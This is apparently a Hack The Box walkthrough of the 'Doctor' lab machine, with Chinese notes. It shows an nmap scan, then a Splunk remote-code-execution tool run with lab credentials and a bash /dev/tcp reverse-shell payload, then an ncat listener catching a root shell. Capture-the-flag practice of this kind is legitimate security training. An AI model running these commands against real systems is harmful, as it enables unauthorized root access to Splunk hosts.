# Nmap 7.91 scan initiated Wed Nov 11 18:57:28 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.209 Nmap scan report for 10.10.10.209 Host is up (0.075s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA) | 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA) |_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Doctor 8089/tcp open ssl/http Splunkd httpd | http-methods: |_ Supported Methods: GET HEAD OPTIONS | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-09-06T15:57:27 | Not valid after: 2023-09-06T15:57:27 | MD5: db23 4e5c 546d 8895 0f5f 8f42 5e90 6787 |_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Nov 11 18:58:22 2020 -- 1 IP address (1 host up) scanned in 53.65 seconds
/Documents/HTB/Doctor/SplunkWhisperer2/PySplunkWhisperer2 master ❯ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'" --lhost IP Running in remote mode (Remote Code Execution) [.] Authenticating... [+] Authenticated [.] Creating malicious app bundle... [+] Created malicious app bundle in: /tmp/tmp76vowwri.tar [+] Started HTTP server for remote mode [.] Installing app from: http://10.10.16.7:8181/ 10.10.10.209 - - [11/Nov/2020 23:48:13] "GET / HTTP/1.1" 200 - [+] App installed, your code should be running now!
Press RETURN to cleanup [.] Removing app... [+] App removed [+] Stopped HTTP server Bye!
获得shell
1 2 3 4 5 6 7 8 9 10 11 12 13
Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.209. Ncat: Connection from 10.10.10.209:52546. bash: cannot set terminal process group (1137): Inappropriate ioctl for device bash: no job control in this shell root@doctor:/# cd root cd root root@doctor:/root# wc -c root.txt wc -c root.txt 33 root.txt root@doctor:/root#